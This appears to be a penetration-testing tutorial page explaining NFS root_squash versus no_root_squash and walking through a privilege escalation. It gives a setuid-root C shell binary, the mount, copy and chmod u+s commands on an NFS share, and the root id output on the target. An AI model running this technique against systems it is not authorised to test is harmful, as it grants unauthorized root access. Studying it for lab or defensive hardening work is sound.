TwitterGithubLinkedinInstagramDiscord

Exploiting NFS weak Permission

Network File System (NFS) is a distributed file system protocol that allows clients to access files over a network as if they were local. However, improper configuration and weak permissions can lead to significant security vulnerabilities, allowing for potential privilege escalation.

Understanding NFS

  • NFS allows remote users to access files stored on a server over a network.

  • Files can be exported from an NFS server and mounted on client machines, enabling shared access.

Understanding root_squash and no_root_squash

The root_squash option is used in NFS to prevent root users on client machines from having root privileges on the NFS server. When this option is enabled, any request made by the root user (UID 0) from a client is mapped to the nobody user (or another specified user) on the NFS server. This means that even if a root user on the client accesses the NFS share, they will not have elevated privileges, effectively restricting their access to what the nobody user can access.

The no_root_squash option allows root users on client machines to retain their root privileges when accessing NFS shares. When this option is enabled, root users on the client can access files on the NFS server with full root privileges. This means they can read, write, and modify files as if they were the root user on the NFS server.

Setting no_root_squash 

dollarboysushil@kali $ nano /etc/exports
...........
...........
/var/nfs/general *(rw,no_root_squash)
...........
...........

Listing all accessible mounts

dollarboysushil@kali $ showmount -e {ip}

Attack scenario

We will create a simple root owned binary which will execute /bin/bash

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}

then compile this .c code as

dollarboysushil@kali: gcc exploit.c -o exploit

Now being the root of our attacking machine

root@kali:~$ sudo mount -t nfs {target_ip}:/tmp /mnt
root@kali:~$ cp exploit /mnt
root@kali:~$ chmod u+s /mnt/exploit

here we are mounting /tmp of target to /mnt of our machine, then we copied our exploit to /mnt then uisng chmod u+s we are setting up setuid in exploit.

Now in target machine

user@target $: cd /tmp
user@target:/tmp $: ./exploit
root@target:/tmp #: id
uid=0(root) gid=0(root) groups=0(root),4(adm)

We are now root.

PreviousCron JobNextSudo + LD_PRELOAD (Shared Libraries)

Last updated